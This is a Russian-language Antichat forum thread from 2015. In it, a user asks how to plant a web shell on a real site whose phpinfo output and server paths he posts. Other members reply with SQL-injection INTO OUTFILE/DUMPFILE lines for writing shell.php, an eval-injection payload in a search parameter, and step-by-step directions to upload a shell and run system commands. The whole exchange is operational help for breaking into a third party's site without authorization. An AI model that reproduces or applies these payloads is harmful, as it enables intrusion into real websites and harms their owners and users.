ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   SQLi и RCE (https://forum.antichat.xyz/showthread.php?t=426004)

BabaDook 28.05.2015 21:34

Всем приветик.

Нашёл сайтик там в одной и формы есть уязвимость

PHP код:

[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]eval()[/COLOR][COLOR="#DD0000"]'d code on line 1[/COLOR][/COLOR] 

Как я понимаю можно залит шел. Подскажите пожалуйста как это можно сделать

phpinfo

.SpoilerTarget" type="button">Spoiler
PHP Version 5.3.3-7+squeeze19

Directive Local Value Master Value

allow_call_time_pass_reference Off Off

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_globals_jit On On

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On Off

display_startup_errors Off Off

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl Off Off

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 0 22527

exit_on_timeout Off Off

expose_php On On

extension_dir /usr/lib/php5/20090626 /usr/lib/php5/20090626

file_uploads On On

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors Off Off

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path /var/www/kuzov-mag.ru/data/www/kuzov-mag.ru/netcat/require/lib/ .:/usr/share/php:/usr/share/pear

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc On Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

mail.add_x_header On On

mail.force_extra_parameters no value no value

mail.log no value no value

max_execution_time 1000 600

max_file_uploads 20 20

max_input_nesting_level 64 64

max_input_time 60 60

max_input_vars 5000 5000

memory_limit 1048576000 512M

open_basedir /var/www/kuzov-mag.ru/data:. no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 100M 100M

precision 14 14

realpath_cache_size 4096k 4096k

realpath_cache_ttl 120 120

register_argc_argv Off Off

register_globals Off Off

register_long_arrays Off Off

report_memleaks On On

report_zend_debug On On

request_order GP GP

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from no value no value

sendmail_path /usr/sbin/sendmail -t -i -f webmaster@kuzov-mag.ru /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 100M 100M

upload_tmp_dir /var/www/kuzov-mag.ru/data/mod-tmp no value

user_dir no value no value

user_ini.cache_ttl 300 300

user_ini.filename .user.ini .user.ini

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On

zend.enable_gc On On

и ещё, через sql inj заливаю шел, шел заливается, но файл пустой

использую такую команду

PHP код:

[COLOR="#000000"]INTO outfile'путь до папки куда можно залить/123.php' FIELDS TERMINATED BY '[COLOR="#0000BB"][/COLOR]'[/COLOR

заранее спасибо ))

Mister_Bert0ni 28.05.2015 22:23

А пробовал так:

union select null,null,(hex()),null,....,null into dumpfile /ful_path/writable_dir/shell.php

union select null,null,(hex()),null,....,null into outfile /ful_path/writable_dir/shell.php

BabaDook 28.05.2015 23:09

а ты попробуй. У меня только две идеи , конвертировать в АССКи и заливать в временную папку, потом копировать.Больше идей нету (((

faza02 29.05.2015 00:28

а я бы тоже попробовал, только сайта нет. и кстати, вы уже большие и можете писать в раздел уязвимостей в ветку вопросов

Take_IT 29.05.2015 00:51

Цитата:

Сообщение от faza02

а я бы тоже попробовал, только сайта нет. и кстати, вы уже большие и можете писать в раздел уязвимостей в ветку вопросов

я бы именно так и порекомендовал делать всем, кто уже имеет 5 репы и собирается создавать новую тему

faza02 29.05.2015 11:12

с RCE все просто: там фильтровались кавычки, но нам они и не нужны.

делаем запрос:

Код:

http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:

Код:


грузим шелл. смотрим текущую папку

Код:

http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.

P. S. при создании темы делайте название более информативным

BabaDook 29.05.2015 11:14

Цитата:

Сообщение от faza02

с RCE все просто: там фильтровались кавычки, но нам они и не нужны.
делаем запрос:
Код:

http://www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}
в код страницы вставляем форму для аплоада:
Код:


грузим шелл. смотрим текущую папку
Код:

http://www.site.ru/search/?action=index&text=$${@system(pwd)}
все, переходим по ссылке на шелл.
P. S. при создании темы делайте название более информативным

Спасибо. Да Извиняюсь за нарушение правил. Больше не буду так.

BabaDook 29.05.2015 12:48

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}[/COLOR][/COLOR] 

Я немного не понял , что это даст?

faza02 29.05.2015 12:51

Цитата:

Сообщение от BabaDook

PHP код:

[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}[/COLOR][/COLOR] 

Я немного не понял , что это даст?

выполнение через eval() команд из POST и GET параметра upl

BabaDook 29.05.2015 14:25

Цитата:

Сообщение от faza02

выполнение через eval() команд из POST и GET параметра upl

Пойду мануалы курить. Ещё раз спасибо.


Время: 23:43